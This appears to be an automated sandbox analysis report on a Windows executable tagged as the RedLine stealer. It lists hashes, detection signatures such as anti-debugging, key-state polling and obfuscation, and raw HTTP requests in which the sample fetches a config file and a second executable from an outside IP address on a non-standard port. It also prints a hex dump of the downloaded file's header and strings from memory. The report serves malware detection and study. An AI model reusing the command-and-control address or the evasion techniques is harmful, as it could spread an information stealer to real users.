Windows Analysis Report
BaGkRDSifo.exe

Overview

General Information

Sample name: BaGkRDSifo.exe
renamed because original name is a hash value
Original sample name: 3b8f605388479cd9296e0be1ea9d1f60.exe
Analysis ID: 1448043
MD5: 3b8f605388479cd9296e0be1ea9d1f60
SHA1: 4608fd9d55cae50eaa9379b02373afea15572eae
SHA256: d550397a71e1fc77be3460d1742f1df63d43ba74487a10ec96befc1c768768bc
Tags: 32exeRedLineStealer
Infos:

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: BaGkRDSifo.exe Virustotal: Detection: 28% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\Desktop\STHealthUpdate.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: BaGkRDSifo.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: BaGkRDSifo.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: System.Windows.Forms.pdb source: BaGkRDSifo.exe, 00000000.00000002.2478418643.0000000000968000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: STHealthClient.pdb source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: BaGkRDSifo.exe, 00000000.00000002.2478418643.0000000000968000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.pdbt source: BaGkRDSifo.exe, 00000000.00000002.2478418643.0000000000968000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: _.pdb source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: STHealthClient.pdbx]D source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: BaGkRDSifo.exe, 00000000.00000002.2478418643.0000000000968000.00000004.00000020.00020000.00000000.sdmp

Networking
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 9876
Source: unknown Network traffic detected: HTTP traffic on port 9876 -> 49701
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 9876
Source: unknown Network traffic detected: HTTP traffic on port 9876 -> 49701
Yara detected Generic Downloader
Source: Yara match File source: 0.2.BaGkRDSifo.exe.6580000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BaGkRDSifo.exe.2aa1f60.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.BaGkRDSifo.exe.5734f52.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BaGkRDSifo.exe.5b80f32.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BaGkRDSifo.exe.5b80000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BaGkRDSifo.exe.45fff90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.7:49701 -> 47.104.173.216:9876
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Mon, 27 May 2024 11:10:41 GMTAccept-Ranges: bytesETag: "f599508326b0da1:0"Server: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 27 May 2024 13:23:01 GMTContent-Length: 243200Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 10 84 2d 2c 71 ea 7e 2c 71 ea 7e 2c 71 ea 7e 32 23 7f 7e 3f 71 ea 7e 0b b7 91 7e 2b 71 ea 7e 2c 71 eb 7e 5c 71 ea 7e 32 23 6e 7e 1c 71 ea 7e 32 23 69 7e a2 71 ea 7e 32 23 7b 7e 2d 71 ea 7e 52 69 63 68 2c 71 ea 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dd 69 54 66 00 00 00 00 50 45 00 00 4c 01 04 00 74 a5 00 50 00 00 00 00 00 00 00 00 e0 00 23 01 0b 01 09 00 00 98 01 00 00 1a 02 00 00 00 00 00 2f cd 00 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 04 00 00 04 00 00 fb 3b 02 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 15 02 00 50 00 00 00 00 60 02 00 8c 95 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 b1 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0d 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 97 01 00 00 10 00 00 00 98 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b4 6d 00 00 00 b0 01 00 00 6e 00 00 00 9c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c0 30 00 00 00 20 02 00 00 16 00 00 00 0a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 8c 95 01 00 00 60 02 00 00 96 01 00 00 20 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /server.txt HTTP/1.1Host: 47.104.173.216:9876Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /STHealthUpdate.exe HTTP/1.1Host: 47.104.173.216:9876
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: global traffic HTTP traffic detected: GET /server.txt HTTP/1.1Host: 47.104.173.216:9876Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /STHealthUpdate.exe HTTP/1.1Host: 47.104.173.216:9876
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://11.65.9.11:9082/jkda/webservice/DPService
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://11.65.9.11:9082/jkda/webservice/DPService#
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.00000000035ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://47.104.173.216:
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.00000000035ED000.00000004.00000800.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://47.104.173.216:9876
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://47.104.173.216:9876/STHealthUpdate.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.00000000035CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://47.104.173.216:9876/server.txt
Source: BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://com.wondersgroup.jkda.application.modules.webservice
Source: BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://com.wondersgroup.jkda.application.modules.webserviceT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://com.wondersgroup.jkda.application.modules.webserviceTU
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.00000000035ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/$
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/AppliyUpLoadT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/AppliyUpLoad_BoErChengT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/ChangestatusT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/CheckUpLoadReportFromBytesT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/DownLoadReportFormIDT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/DownLoadReportFormPDFByAccountPassWordT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/DownLoadReportForm_PKIT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/DownloadBarCodeCancelT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/DownloadBarCodeFlagT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/DownloadBarCodeT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/DownloadReportByBarCodeT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/DownloadReportByBarcodeNoT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/DownloadReportByPersonIDAndClientNoAndSickTypeNoT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/DownloadReportByPersonIDT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/DownloadReportByReportFormIDT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/DownloadReportFormIDListByBarcodeNoT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/DownloadReportFormIDListByClientBarcodeNoT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/DownloadReportT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/GetReportFormColumnT
